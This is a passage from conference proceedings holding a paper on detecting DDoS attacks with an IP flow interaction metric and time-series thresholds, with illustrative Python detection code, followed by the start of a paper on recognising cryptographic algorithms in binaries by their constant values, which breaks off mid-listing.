13. Fiat, A., Shamir, A.: How to prove yourself: Practical solutions to identification and signature problems. In: Odlyzko, A.M. (ed.) CRYPTO 1986. LNCS, vol. 263, pp. 186–194. Springer, Heidelberg (1987)
14. Kim, S.J., Park, S.J., Won, D.H.: Convertible group signatures. In: Kim, K.-c., Matsumoto, T. (eds.) ASIACRYPT 1996. LNCS, vol. 1163, pp. 311–321. Springer, Heidelberg (1996)
15. Nakanishi, T., Fujii, H., Hira, Y., Funabiki, N.: Revocable group signature schemes with constant costs for signing and verifying. In: Jarecki, S., Tsudik, G. (eds.) PKC 2009. LNCS, vol. 5443, pp. 463–480. Springer, Heidelberg (2009)
16. Nakanishi, T., Funabiki, N.: Verifier-local revocation group signature schemes with backward unlinkability from bilinear maps. In: Roy, B. (ed.) ASIACRYPT 2005. LNCS, vol. 3788, pp. 533–548. Springer, Heidelberg (2005)
17. Nakanishi, T., Sugiyama, Y.: A group signature scheme with efficient membership revocation for reasonable groups. In: Wang, H., Pieprzyk, J., Varadharajan, V. (eds.) ACISP 2004. LNCS, vol. 3108, pp. 336–347. Springer, Heidelberg (2004)
Detecting Distributed Denial of Service Attack Based on Multi-feature Fusion
Jieren Cheng1,2, Jianping Yin1, Yun Liu1, Zhiping Cai1, and Chengkun Wu1
1 School of Computer, National University of Defense Technology, 410073 Changsha, China
2 Department of Mathematics, Xiangnan University, 423000 Chenzhou, China
[email protected]
Abstract. Detection of Distributed Denial of Service (DDoS) attacks is currently a hot topic in both industry and academia. We present an IP flow interaction algorithm (IFI) merging multiple features of normal flow and DDoS attack flow. Using IFI time series to describe the state of network flow, we propose an efficient DDoS attack detection method based on IFI time series (DADF). DADF employs an adaptive parameter estimate algorithm and detects DDoS attacks by associating with the states of the IFI time series and an alert evaluation mechanism. Experiment results demonstrate that IFI fuses the multiple features of normal flow and DDoS attack flow well and can efficiently distinguish normal flow from DDoS attack flow, and that DADF can quickly detect DDoS attacks with a higher detection rate and a lower false alarm rate under relatively large normal background flows.
Keywords: Network Security, Distributed Denial of Service, Normal Profile, Multi-feature Fusion.
1 Introduction
Distributed Denial of Service (DDoS) attack is one of the main threats that the Internet is facing. DDoS attacks currently tend to use actual source IP addresses [1] and to simulate normal flows in order to perform an attack, and they cause serious damage to the victims by flooding traffic or by using periodically low-rate attack flows [2]. Furthermore, at an early stage of a DDoS attack the traffic changes are difficult to detect because low traffic fluctuations are not obvious. Many approaches [3,4,5] based on flow dissymmetry can detect dissymmetric attack flows, but the incoming and outgoing traffic of normal flows are sometimes highly disproportional, and such approaches are more expensive and difficult to implement cooperatively at the edge networks. Moreover, an attacker may use random spoofed source IP addresses, or simulate normal flows to send out attack packets, so that the attack traffic from each source network stays within the normal range and goes unnoticed compared with legitimate traffic flows. Thus detecting attack traffic accurately can be difficult or impossible at the source network. [6] detected DDoS attacks using the distribution of IP addresses; [7,8] detected attacks based on abrupt traffic change; to avoid the shortcoming of methods based on a single attack characteristic, [9,10,11] integrated multiple characteristics to detect DDoS attacks. However, these methods are disturbed by relatively large volumes of normal background flows. The distributed collaborative methods [12,13] employ distributed sensors to detect the attacks collaboratively, but it is difficult to deploy such a system and its detection quality relies on the detection capability of each sensor. Based on normal flow features, [14] established detection models that could detect different kinds of attacks. However, it is very difficult to build a stable model for all kinds of normal flows, and attackers may launch an attack by simulating the normal flows. Hence, detection of DDoS attacks is a challenging task requiring novel approaches. This paper presents an IP Flow Interaction algorithm based on multiple features of normal flow and DDoS attack flow (IFI) and proposes a DDoS attack detection method based on IFI time series (DADF). Theoretical analysis and experiment results demonstrate that the IFI algorithm makes effective use of multiple features and can reflect the differences between normal flow and DDoS flow, and that DADF can use the IFI time series of network flows to detect DDoS attacks with a higher detection rate and a lower false alarm rate.
D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 132–139, 2009. © Springer-Verlag Berlin Heidelberg 2009
2 IFI Algorithm
The common characteristic of normal flows and attack flows is interaction. However, because their interaction purposes differ, their statistical features on IP addresses and ports are essentially different. Assume a network flow F in a certain time period T is described as <(t1,s1,sp1,d1,dp1), (t2,s2,sp2,d2,dp2), …, (tn,sn,spn,dn,dpn)>, where for i = 1,2,…,n, ti is the timestamp of the ith packet and si, spi, di, dpi represent the source IP address, the source port, the destination IP address and the destination port of the ith packet.
Definition 1. Classify the n packets so that packets with the same source IP address fall into one class and packets with the same destination IP address fall into one class. Denote the class with source IP address Ai as IPS(Ai), and the class with destination IP address Aj as IPD(Aj). If a source IP address Ai in class IPS(Ai) makes class IPD(Ai) nonempty, then IPS(Ai) is called an Interaction Flow (IF) and denoted IF(Ai). If a source IP address Ai in class IPS(Ai) makes class IPD(Ai) empty, then IPS(Ai) is called a Source Half Interaction Flow (SH) and denoted SH(Ai). If a destination IP address Ai in class IPD(Ai) makes class IPS(Ai) empty, then IPD(Ai) is called a Destination Half Interaction Flow (DH) and denoted DH(Ai). Flows SH and DH are together called Half Interaction Flows (HF).
Normal flows are mostly IFs with interaction per unit time and obey the TCP congestion control protocol to avoid congestion, even if a web server sustains a flash crowd. Hence, in a time period T the number M of all IFs is large while the number S of all SHs and the number D of all DHs are relatively small, so |S−D|/M → 0. However, successful DDoS attack flows are mostly HFs per unit time, because a DDoS attack denies network service by continually sending out a great number of attack packets and does not obey the TCP congestion control protocol, especially when the attacker performs a DDoS attack with spoofed source IP addresses. For all the HFs, when the source-to-destination address relation is many-to-one dissymmetric, the number S of all SHs and the number D of all DHs satisfy S > D. Furthermore, in a time period T, S is large because of the distribution of attack source addresses and abrupt traffic change, and D is relatively small due to the concentrated target, while the number M of all IFs is small, so |S−D|/M → ∞. Additionally, when the source-to-destination address relation is one-to-many dissymmetric at the early stage of an indirect DDoS [11], in T, S is small due to the concentrated target and D is large because of the distribution of attack source addresses and abrupt traffic change; if M is small, then again |S−D|/M → ∞. Furthermore, the number of different port numbers satisfies Port(SH(Aj)) > θ/ms or Port(DH(Ai)) > θ/ms, where θ is the threshold. When the attack flow is small but the normal background flows are relatively large, the detection quality is affected. In order to reduce the interference of IFs and improve the detection sensitivity for attack flows, we define the Source Address Entropy (SAE), which reflects the distribution of source addresses of IFs [6].
Definition 2. Classify the n packets and obtain all the interaction flows IFs of F as IF1, IF2, …, IFm. The number of packets with source IP address Ai in IFi is denoted sipi, i = 1,2,…,m. The number of packets of all the IFs is denoted ASIP. All the source half interaction flows SHs of F are denoted SH1, SH2, …, SHS, and the number of different source port numbers of class SHi is denoted Port(SHi), i = 1,2,…,S. All the destination half interaction flows DHs are denoted DH1, DH2, …, DHD, and the number of different destination port numbers of class DHi is denoted Port(DHi), i = 1,2,…,D. The SAE is defined as
$$ SAE = -\sum_{i=1}^{m} \frac{sip_i}{ASIP} \log_2\left(\frac{sip_i}{ASIP}\right) \qquad (1) $$
We give the IP Flow Interaction Feature (IFI) algorithm merging multiple features, namely flow interaction, source-to-destination address dissymmetry, distribution of attack source addresses, concentrated target and abrupt traffic change, as follows:
Definition 3. The IFI is defined as
$$ IFI_F = \frac{f(SAE)\left(|S-D| + \sum_{i=1}^{S} weight(Port(SH_i)) + \sum_{j=1}^{D} weight(Port(DH_j))\right)}{m+1} \qquad (2) $$
in which
$$ f(x) = \begin{cases} x & x > 1 \\ 1 & x \le 1 \end{cases}, \qquad weight(x) = \begin{cases} x & x/\Delta t > \theta \\ 0 & x/\Delta t \le \theta \end{cases} $$
where Δt is the sampling time period and θ is the threshold obtained from normal flow by a statistical method, which can be the maximum number of ports of an HF flow in Δt. It is very difficult or impossible to translate a large number of attack flows with half interaction into IF flows per unit time outside the source network. Consequently, IFI is efficient for distinguishing normal flow from DDoS attack flow.
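As an added example (not the authors' code), the following Python computes Definitions 1 to 3 over constructed packet samples: a purely interactive normal sample, a many-to-one spoofed flood, and a single source flooding a silent host on randomized destination ports. The values Δt = 1 s and θ = 2 are chosen here for illustration and are not from the paper.

```python
import math
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class IFIResult:
    M: int        # number of interaction flows (IFs)
    S: int        # number of source half interaction flows (SHs)
    D: int        # number of destination half interaction flows (DHs)
    sae: float    # source address entropy over the IFs, eq. (1)
    ifi: float    # IFI value, eq. (2)


def classify(packets):
    """Definition 1: split addresses into IF, SH and DH classes.

    Each packet is (t, src, sport, dst, dport).  An address seen both as a source
    and as a destination owns an IF; seen only as a source it owns an SH; seen
    only as a destination it owns a DH.
    """
    by_src, by_dst = defaultdict(list), defaultdict(list)
    for pkt in packets:
        by_src[pkt[1]].append(pkt)
        by_dst[pkt[3]].append(pkt)
    ifs = {a: pk for a, pk in by_src.items() if a in by_dst}
    shs = {a: pk for a, pk in by_src.items() if a not in by_dst}
    dhs = {a: pk for a, pk in by_dst.items() if a not in by_src}
    return ifs, shs, dhs


def source_address_entropy(ifs):
    """Equation (1): entropy of the packet-count distribution over IF source addresses."""
    asip = sum(len(pk) for pk in ifs.values())
    if asip == 0:
        return 0.0
    return -sum(len(pk) / asip * math.log2(len(pk) / asip) for pk in ifs.values())


def ifi(packets, dt, theta):
    """Equation (2) for one sampling period of length dt with port threshold theta."""
    ifs, shs, dhs = classify(packets)
    sae = source_address_entropy(ifs)
    f_sae = sae if sae > 1 else 1.0                       # f(x)

    def weight(x):                                        # weight(x)
        return x if x / dt > theta else 0

    port_sh = sum(weight(len({p[2] for p in pk})) for pk in shs.values())  # distinct source ports
    port_dh = sum(weight(len({p[4] for p in pk})) for pk in dhs.values())  # distinct destination ports
    value = f_sae * (abs(len(shs) - len(dhs)) + port_sh + port_dh) / (len(ifs) + 1)
    return IFIResult(len(ifs), len(shs), len(dhs), sae, value)


# --- constructed samples (not taken from the paper's data sets) ----------------
SERVER = "10.0.0.1"


def normal_sample():
    """Three clients each exchange a request/reply with the server: only IFs."""
    pk = []
    for i, client in enumerate(["10.0.0.2", "10.0.0.3", "10.0.0.4"]):
        pk.append((0.01 * i, client, 50000 + i, SERVER, 80))
        pk.append((0.01 * i + 0.005, SERVER, 80, client, 50000 + i))
    return pk


def spoofed_flood_sample():
    """Normal traffic plus 20 spoofed sources hitting the server (many-to-one): 20 SHs."""
    pk = normal_sample()
    for i in range(20):
        pk.append((0.5 + 0.001 * i, f"192.0.2.{i + 1}", 1024 + i, SERVER, 80))
    return pk


def random_port_flood_sample():
    """Normal traffic plus one source flooding a silent host on 30 destination
    ports: one SH and one DH whose Port(DH) exceeds the threshold."""
    pk = normal_sample()
    for i in range(30):
        pk.append((0.5 + 0.001 * i, "198.51.100.7", 40000, "10.0.0.9", 1000 + i))
    return pk


if __name__ == "__main__":
    for name, sample in [("normal", normal_sample()),
                         ("spoofed flood", spoofed_flood_sample()),
                         ("port flood", random_port_flood_sample())]:
        print(name, ifi(sample, dt=1.0, theta=2))
```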
3 DDoS Attack Detection Method
When the attack flows are relatively small versus massive normal background flows, IFI will be small. Conversely, because network noise or other non-attack uncertainty may cause packet loss, delay or jitter, the IFI of normal flows will sometimes show abnormal changes. Hence, we propose an efficient detection method based on IFI time series (DADF).
3.1 DDoS Attack Detection Model
Assume that the sliding detection window size is W, the sampling time period is Δt, the sampled IFI time series of network flow F is a1, a2, …, aW, and the attack threshold is H. G(x,y) denotes x > y, F(x) denotes that x is an abnormal value, and the FDD (IFI-based DDoS Attack Detection Model) is defined as:
$$ \forall i,\ i \ge W:\ G(a_{i-W+1}, H) \wedge G(a_{i-W+2}, H) \wedge \cdots \wedge G(a_i, H) \rightarrow F(a_i) \qquad (3) $$
$$ \forall i,\ i > 1:\ F(a_{i-1}) \wedge G(a_i, H) \rightarrow F(a_i) \qquad (4) $$
Rule (3) states that ai is an abnormal value if each of the W values a_{i−W+1}, …, a_i exceeds H. Rule (4) states that ai is an abnormal value if a_{i−1} is an abnormal value and ai exceeds H. Rule (3) is the premise of rule (4), and rule (4) helps to decrease the number of judgments made by the detection system. In real-time applications, the sliding detection window moves forward by one step once the detection for the current IFI is completed.
3.2 Adaptive Parameter Estimate Algorithm
In real applications, it is hard to specify the proper parameters of FDD manually because of differences in sampling time interval, the many kinds of normal traffic, network environments and application requirements. We present an adaptive parameter estimate algorithm.
Algorithm 1. The adaptive parameter estimate algorithm
Input: an initial sample A, the smoothing R of A, the average value RMean of R, the maximum value RMax of R, a stopping criterion C, an ideal false alarm rate IFA.
Output: sliding detection window size W, attack threshold H, real false alarm rate RFA, and the graph of the change of RFA with the increase of H.
Processing procedure:
1. Initialize the related variables;
2. While (criterion C is not satisfied) {
3.   Initialize the related variables;
4.   H = RMean;
5.   While (RFA < IFA and H ≤ RMax) {
6.     Detect sample A using the FDD model;
7.     Calculate the real false alarm rate RFA;
8.     H = H + RMean;
9.     return H, RFA; }
10.  W = W + 1;
11.  return W; }
Sample the normal network flow F with time interval Δt and calculate the IFI of each sample; after N samples, a time series sample of IFI is obtained, A(N, Δt) = {IFIi, i = 1,2,…,N}, where N is the length of the series. Let IFIi = ai, i = 1,2,…,N, then use the locally weighted linear regression smoothing method (Loess) [15] to smooth the sample and eliminate the random noise of sample A. Loess is a locally weighted scatter plot smoother using linear least squares fitting and a second-degree polynomial. We specify the span of Loess as 2*W+1 (W is the size of the sliding detection window). Assume a1, a2, …, an are transformed into r1, r2, …, rm by the Loess smoothing method; calculate the average value of r1, …, rm, denoted RMean, and the maximum value of r1, …, rm, denoted RMax. A network flow state is defined as the normal state when IFI ≤ RMean, the quasi-abnormal state when RMean < IFI ≤ RMax, and the abnormal state when IFI > RMax. If the attack threshold can be set between RMean and RMax, namely detecting attacks in the quasi-abnormal state, the detection rate will increase drastically. However, the premise is that the false alarm rate must stay within a viable span. The process of the adaptive parameter estimate algorithm is given in Algorithm 1.
3.3 Alert Evaluation Mechanism
The causes of abnormal changes in the IFI states of network flows include DDoS attacks as well as congestion and other reasons. Hence, our detection system employs an alert evaluation mechanism based on the alert frequency and time interval: when U (U ≥ 1) anomalous values are detected in a specified time interval ΔT (ΔT ≥ 0), the system generates an alarm. The values of ΔT and U may be set dynamically according to the network security situation, because larger ΔT and U decrease the risk of false alarms but also decrease the time efficiency.
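As an added example (not the authors' code), the following Python implements rules (3) and (4), the (W, H) sweep of Algorithm 1 and the alert evaluation of Section 3.3 on constructed IFI series. Two assumptions of this example: a centred moving average of span 2W+1 stands in for Loess, and the stopping criterion C is taken to be RFA ≤ IFA.

```python
def fdd_flags(series, W, H):
    """Return one abnormal/normal flag per sample of an IFI series (0-indexed here).

    Rule (4) is tried first: a_i is abnormal if a_{i-1} was abnormal and a_i > H,
    with no need to re-examine the window.  Otherwise rule (3) applies: a_i is
    abnormal when all W samples a_{i-W+1}, ..., a_i exceed H.
    """
    flags = []
    for i, a in enumerate(series):
        if i >= 1 and flags[i - 1] and a > H:                              # rule (4)
            flags.append(True)
        elif i >= W - 1 and all(x > H for x in series[i - W + 1:i + 1]):   # rule (3)
            flags.append(True)
        else:
            flags.append(False)
    return flags


def smooth(series, span):
    """Centred moving average of width `span` (assumption of this example:
    it stands in for the Loess smoothing used in the paper)."""
    half = span // 2
    out = []
    for i in range(len(series)):
        window = series[max(0, i - half):i + half + 1]
        out.append(sum(window) / len(window))
    return out


def estimate_parameters(sample, ideal_far, max_W=10):
    """Algorithm 1 as read by this example.

    For W = 1, 2, ... the normal sample is smoothed with span 2W+1, giving RMean
    and RMax.  H sweeps from RMean upward in steps of RMean while H <= RMax; every
    flag raised on the normal sample is a false alarm, so RFA = flagged / N.  The
    first (W, H) with RFA <= IFA (criterion C) is returned together with the
    (W, H, RFA) points that make up the RFA-versus-H graph.
    """
    curve = []
    for W in range(1, max_W + 1):
        R = smooth(sample, 2 * W + 1)
        r_mean, r_max = sum(R) / len(R), max(R)
        H = r_mean
        while H <= r_max:
            flags = fdd_flags(sample, W, H)
            rfa = sum(flags) / len(flags)
            curve.append((W, H, rfa))
            if rfa <= ideal_far:
                return {"W": W, "H": H, "RFA": rfa, "RMean": r_mean, "RMax": r_max, "curve": curve}
            H += r_mean
    return None   # no (W, H) inside the search bounds reaches IFA


def alert_indices(flags, U, delta_T, dt):
    """Alert evaluation: alarm at sample i when U abnormal samples (i included)
    fall within an interval of length delta_T; dt is the sampling period."""
    abnormal = [i for i, f in enumerate(flags) if f]
    return [abnormal[j] for j in range(U - 1, len(abnormal))
            if (abnormal[j] - abnormal[j - U + 1]) * dt <= delta_T]


# Constructed IFI series: a normal training sample with two noise spikes (0.9, 1.1) ...
NORMAL_IFI = [0.2, 0.3, 0.25, 0.4, 0.35, 0.3, 0.9, 0.2, 0.3, 0.45,
              0.25, 0.3, 0.35, 0.2, 1.1, 0.3, 0.25, 0.4, 0.3, 0.35]
# ... and a monitored series in which samples 4..7 carry attack-sized IFI values.
TEST_IFI = [0.3, 0.25, 0.4, 0.3, 7.2, 7.5, 6.9, 8.1, 0.35, 0.3]


def run_example(ideal_far=0.05, U=2, delta_T=0.2, dt=0.1):
    """Train on NORMAL_IFI, then detect on TEST_IFI and evaluate alerts."""
    params = estimate_parameters(NORMAL_IFI, ideal_far)
    flags = fdd_flags(TEST_IFI, params["W"], params["H"])
    return params, flags, alert_indices(flags, U, delta_T, dt)


if __name__ == "__main__":
    params, flags, alarms = run_example()
    print("W =", params["W"], "H = %.4f" % params["H"], "RFA =", params["RFA"])
    print("flags:", flags)
    print("alarms at samples:", alarms)
```

On the training series, W = 1 cannot reach the 5% target because each isolated noise spike exceeds every threshold up to RMax, whereas W = 2 reaches RFA = 0 at H = RMean; on the monitored series the first attack sample is not flagged until the window fills, after which rule (4) carries the abnormal state forward.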
4 Experiments and Results
The experiment used the normal flow data of 1999 and the DDoS flow data LLDoS2.0.2 of 2000 from the MIT Lincoln Lab [16].
4.1 Feature
The IFI time series and the number of packets (size of traffic) of the corresponding traffic of the normal flows, obtained by multiple sampling and calculation, are depicted in Figure 1. Similarly, the results for the abnormal flows are depicted in Figure 2. From Figures 1 and 2 we can see that IFI time series are sensitive to attack flows and are magnified for attack flows using randomized destination ports, while they are steady and small for normal flows. As depicted in Figure 2, there are few IFIs whose size is smaller than the size of the attack traffic, and the main reason is that the few normal flows that received responses become IFs in a certain Δt. So the sampling period can influence the IFI state of abnormal flows containing DDoS attack flow, and it can be set to a proper size according to the quality of network service.
Fig. 1. IFI time series and traffic of 1999 normal flow (panels: IFI of Normal Flow and Size of Normal Traffic, sampled at 1/0.01s and 1/0.1s; x-axis: Time Sample Point, y-axis: Size)
Fig. 2. IFI time series of LLDoS2.0.2-Inside network flow (panels: IFI of Normal Flow vs. IFI of Attack Flow, and Size of Normal Traffic vs. Size of Attack Traffic, sampled at 1/0.01s and 1/0.1s; x-axis: Time Sample Point, y-axis: Size)
Fig. 3. IFI time series of LLDoS2.0.2-Outside network flow (same panels and axes as Fig. 2)
We obtained attack flows from the attack flow data LLSDDOS2.0.2-Outside.dump, and simulated the attack flows sent by “Zombies” in an indirect DDoS attack. Figure 3 shows that, for an indirect DDoS attack, IFI is sensitive to attack flows and is magnified because of the randomized source ports used.
4.2 Performance Comparison
We compared the IFI algorithm with previous similar works, one of which is the Entropy of Feature Distributions (EFD) method [6]. Setting the sampling period Δt to 0.1s, we obtained the IFI and EFD time series of normal flows respectively; then, mixing the normal flows with attack flows, we obtained the IFI and EFD time series of abnormal flows respectively. In Figure 4 the vertical axis represents the detection rate and the false positive rate, and the horizontal axis represents the number of normal packets divided by the number of attack packets. The detection results of IFI with an SVM classifier and of EFD with an SVM classifier are shown in Figure 4. As the background network flows increase, the detection rate of the IFI method drops from 100% to 99.8%, with an average detection rate of 99.9%. The results demonstrate that the IFI method can effectively identify abnormal flows and is insensitive to large normal background flows, so it can be deployed on attack source, intermediate and terminal equipment to detect attacks. The main reason for false negatives is the network state shift caused by random network noise. The false alarm rate of the IFI method increases from 0.0% to 2.5%, with an average false alarm rate of 2.1%. The results show that the IFI method can accurately identify normal flow and does not lead to a high false positive rate with large normal flows. The main reasons for false positives are two: (1) random network noise; (2) network delay and packet loss. EFD is designed to extract the distributed IP address features of DDoS attacks using a four-dimensional characteristic vector, and it calculates the feature values without distinguishing the normal flows from the attack flows. IFI, on the other hand, is designed to extract the multiple features of normal flow and DDoS attack flow using a one-dimensional characteristic vector; it helps to separate attack flows from normal flows effectively and calculates their characteristic values respectively, so as to reduce the interference of normal flows effectively. By comparison, the IFI method has lower false negative and false positive rates, and the IFI algorithm is efficient for DDoS attack detection.
We compared the DADF method with the IFI-based SVM method under the same conditions as above. Furthermore, for fairness to both methods, the abnormal alert time interval ΔT was set to zero and the number of anomalies U was set to one. The results are shown in Figure 5. For the DADF method, the detection rate is 100% for each test; as the background network flows increase, the false alarm rate of the DADF method increases from 0.0% to 0.1%, with an average false alarm rate of 0.1%. The results show that the DADF method has a higher detection rate and a lower false alarm rate than the IFI-based SVM method. The IFI-based SVM method detected the IFI of the current network flows in isolation, whereas the DADF method detected the IFI of the current network flows by associating it with the states of the IFI time series, with a sliding detection window size W of three in this experiment. In summary, IFI can be used to distinguish normal flow from DDoS attack flow, and DADF can effectively detect DDoS attacks under large normal background flows.
Fig. 4. Comparison of different algorithms (false alarm rate and detection rate, in %, of IFI and EFD versus the increase multiple of network flow, 1 to 10)
Fig. 5. Comparison of different detection methods (false alarm rate and detection rate, in %, of IFI based on SVM and IFI based on FDD versus the increase multiple of network flow, 1 to 10)
5 Conclusions
DDoS attacks can cause severe disruption to the stability of the Internet. In this paper, we propose an IFI algorithm based on multi-feature fusion. Using IFI time series to describe the state of network flow, we propose an efficient DDoS attack detection method based on IFI time series (DADF). DADF obtains its model parameters from training samples of normal flows by an adaptive parameter estimate algorithm and detects DDoS attacks by associating with the states of the IFI time series and an alert evaluation mechanism. Analyses and experiment results show that IFI can be used to identify DDoS attack flow, and that DADF can quickly detect DDoS attacks with a higher detection rate and a lower false alarm rate under relatively large normal background flows. In the future, we will explore how to use our method to defend against DDoS attacks.
Acknowledgments. This work is supported by the National Science Foundation of China (60970034, 60603062, 60603015), the Scientific Research Fund of Hunan Provincial Education Department (07C718), the Foundation for the Author of National Excellent Doctoral Dissertation (2007B4), the Science Foundation of Hunan Province (06JJ3035), and the Application of Innovation Plan Fund of the Ministry of Public Security (2007YYCXHNST072).
Researching on Cryptographic Algorithm Recognition Based on Static Characteristic-Code Tie-Ming Liu, Lie-hui Jiang, Hong-qi He, Ji-zhong Li, and Xian Yu National Digital Switching System Engineering & Technology Research Center Zhengzhou, Henan Province 450002, China [email protected]
Abstract. Recognizing cryptographic algorithms in binary code plays an important role in checking malicious code and protecting the security of computer systems. This paper first introduces the current situation of algorithm recognition and characteristic-code checking, uses software reverse-engineering technology to extract the characteristic-codes of various cryptographic algorithms, and builds a static characteristic database of cryptographic algorithms. The paper then applies the Boyer-Moore matching algorithm to design a scanning tool for cryptographic algorithms, tests its efficiency and discusses its reliability; finally, the paper points out the direction of development for algorithm recognition and the technologies that will be adopted in the field of software reverse engineering. Keywords: Algorithm Recognition, Cryptographic Algorithm, Characteristic-code, Disassemble, Decompile.
1 Introduction
In the field of communication and computer security, the security of data transmission and software systems often depends on some cryptographic algorithm, and at the same time viruses and Trojans also use the protection mechanism of cryptographic algorithms to hide their static characteristics. Recognizing the cryptographic algorithm in binary code therefore plays an active role in checking malicious code and protecting computer security. Research on algorithm recognition, which belongs to the category of program understanding [1], mainly concerns optimizing code and analyzing programs based on the source code. Prof. Robert Metzger at MIT has already built an automated recognizing and replacing system based on AST (Abstract Syntax Tree) technology [2], with good results. Domestic researchers used a Bayes decision model [3] to recognize whether a cryptographic algorithm is contained in the target files. This method needs a large number of executable code samples and uses subroutines as the basic unit of recognition; however, it cannot locate the specific cryptographic algorithm. The cryptographic algorithm recognition technology based on characteristic-code checking proposed in this paper can effectively search for cryptographic algorithms in target binary files and mark their names.
D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 140–147, 2009. © Springer-Verlag Berlin Heidelberg 2009
2 Associated Research
2.1 The Characteristic-Code Checking Technology
Static characteristic-code checking is typically applied in virus checking and recognition. In this method the known, specific characteristic-codes of viruses are collected in a database, and the virus checking engine analyzes the target file against the characteristic-codes stored in the database to decide whether a virus is present in the file. The reliability of static characteristic-code checking depends on the static characteristic-code database, so anti-virus software must update its virus database regularly in order to catch viruses and their variants. Many strategies are used for locating the characteristic-code of a new virus, and different anti-virus manufacturers use different strategies. The crucial module in an anti-virus engine is the characteristic-code database, because the accuracy and timeliness of characteristic-code extraction greatly affect the anti-virus efficiency. In [4] three formats for extracting the characteristic-code are given: the MD5 format, the string format and the two-segment checksum format.
2.2 The Algorithm Recognition Technology
In the field of reverse engineering, algorithm recognition is studied at three levels: the binary level, the assembly level and the high-level-language level. The levels of algorithm recognition in reverse engineering and the overall framework used are shown in Figure 1. Algorithm recognition at the binary level uses a static characteristic-code to mark an algorithm. This technology is used for checking viruses and is not frequently seen in algorithm recognition. This paper applies the static characteristic-code to algorithm recognition after studying the mechanisms of cryptographic algorithms.
Algorithm recognition at the assembly level needs to disassemble the binary file [5], using mutual disassembly and heuristic algorithms in order to increase the precision. Usually this level of recognition is achieved statistically, so large numbers of samples are required; semantic analysis can effectively mark the dynamic execution process, and this technology can increase the precision and reliability of recognition, but there is no corresponding achievement at home or abroad yet. Algorithm recognition at the high-level-language level needs to decompile the target files, based on disassembly, to improve program readability [6]. So far, Hex-Rays is one of the mature decompilers, developed by Hex-Rays SA. This software can decompile partly or totally under the x86 instruction set, so algorithm recognition on source code, as studied in program understanding, can be used as a source of reference. The target of recognition is the high-level language produced by decompilation. This research is not seen often at home or abroad.
[Figure 1: the binary code segment is disassembled by a disassembler into a disassembly result, which a decompiler turns into a decompiler result; at each of the three levels algorithm recognition is applied: recognition based on characteristic-code and data mining (binary level), recognition based on semantics and statistics (assembly level), and recognition based on AST and characteristic expression (high-language level), ……]
Fig. 1. The algorithm recognition in reverse engineering and its key technologies
3 Extracting the Characteristic-Code from Cryptographic Algorithms
Extracting the characteristic-code from cryptographic algorithms is important because the precision of recognition depends on its reliability. Cryptographic algorithms [7] use static constants such as the initialization link value, addition constants, S boxes, interchange boxes and big prime numbers, and when the standard cryptographic libraries are analyzed with reverse-analysis tools these characteristic-codes are found to appear in the code section or data section of the disassembly result. Therefore the common cryptographic algorithms can be marked by these static characteristic-codes. The flow of constructing the static characteristic-code database is shown in Figure 2.
[Figure 2: research on the mechanism of common cryptographic algorithms → extract the characteristic-code from cryptographic algorithms (initialized link value, addition constants, S box, interchange box, …) → build the base of cryptographic algorithm static character-code]
Fig. 2. Framework for extracting the characteristic-code from cryptographic algorithms
Cryptographic algorithms, according to the differences in their cryptographic mechanism, are divided into hash algorithms, grouping (block) cryptographic algorithms and public key cryptographic algorithms. The process of extracting the characteristic-codes of these three kinds of algorithm is discussed next, with examples explained in detail.
3.1 The Characteristic-Code of Hash Functions
A hash function maps a finite-length input to a fixed-length output, and it is efficient. The structure of a hash function is typically iterative over blocks: the finite-length input is divided into blocks xi of r bits each, and this division needs extra padding bits to make sure that the total length is a multiple of r. Each block xi is an input of the compression function f, which takes the n-bit intermediate result and the next input block xi as parameters and computes a new n-bit intermediate result. The hash function uses an initialization value to start processing the data. Next, the static characteristic-code of SHA256 is introduced as an example. The SHA256 algorithm produces hash values of 256 bits. During initialization, 8 initial 32-bit values are used: 0x6A09E667, 0xBB67AE85, 0x3C6EF372, 0xA54FF53A, 0x510E527F, 0x9B05688C, 0x1F83D9AB, 0x5BE0CD19. A SHA256 implementation can perform this initialization in different ways; however, the 8 constants never change, so the 8 initial 32-bit link values are chosen as the static characteristic-code. After the characteristic-code has been extracted, the target file is scanned. If all 8 initial 32-bit link values defined by the SHA256 algorithm match values in the target code, the SHA256 algorithm is contained in the target file. For example, all 8 constants were found in the code segment shown in Figure 3. Because this characteristic-code appears, it is conjectured that the file contains the SHA256 algorithm, and disassembling and analyzing the file proves that the function of this code is the initialization of SHA256.

00401225 8B442404        mov  eax,[esp+ARG_0]
00401229 83602000        and  dword ptr [eax+20H],0
0040122D 83602400        and  dword ptr [eax+24H],0
00401231 C70067E6096A    mov  dword ptr [eax],6A09E667H
00401237 C7400485AE67BB  mov  dword ptr [eax+4],0BB67AE85H
0040123E C7400872F36E3C  mov  dword ptr [eax+8],3C6EF372H
00401245 C7400C3AF54FA5  mov  dword ptr [eax+0CH],0A54FF53AH
0040124C C740107F520E51  mov  dword ptr [eax+10H],510E527FH
00401253 C740148C68059B  mov  dword ptr [eax+14H],9B05688CH
0040125A C74018ABD9831F  mov  dword ptr [eax+18H],1F83D9ABH
00401261 C7401C19CDE05B  mov  dword ptr [eax+1CH],5BE0CD19H
Fig. 3. The target code segment including the static character-code of the SHA256 algorithm
Because the Intel architecture is little-endian, the constants appear in the target code as 67E6096A, 85AE67BB, 72F36E3C, 3AF54FA5, 7F520E51, 8C68059B, ABD9831F, 19CDE05B. The static characteristic-code database of hash algorithms, which contains the codes of MD4, MD5 and SHA256, can be constructed by a large amount of statistical analysis.
3.2 The Characteristic-Code of Grouping (Block) Cryptographic Algorithms
The mathematical model of a grouping (block) cryptographic algorithm can be abstracted into several parts: clear data, key, encryption, encrypted data and decryption. Encryption with a grouping key works as follows: the sequence encoding the clear data is divided into groups of equal length, and the clear data and the key sequence are input. Under the control of the key, the cryptographic algorithm outputs encrypted data of equal length. The encrypted data are stored and transmitted, and the decryption key sequence is also input. Finally, clear data of equal length are output by the decryption algorithm under the control of the key. In implementations the grouping cipher uses an S box and an interchange box as constants. Next, the AES grouping algorithm is taken as an example to show how the S box appears in a target file. The S box, which is used for table lookup when encrypting groups, is defined as a static array. For example, the S box of AES is typically defined as:

static const u32 Sbox0[256] = {
    0xC66363A5, 0xF87C7C84, 0xEE777799, 0xF67B7B8D, 0xFFF2F20D,
    0xD66B6BBD, 0xDE6F6FB1, 0x91C5C554, 0x60303050, 0x02010103,
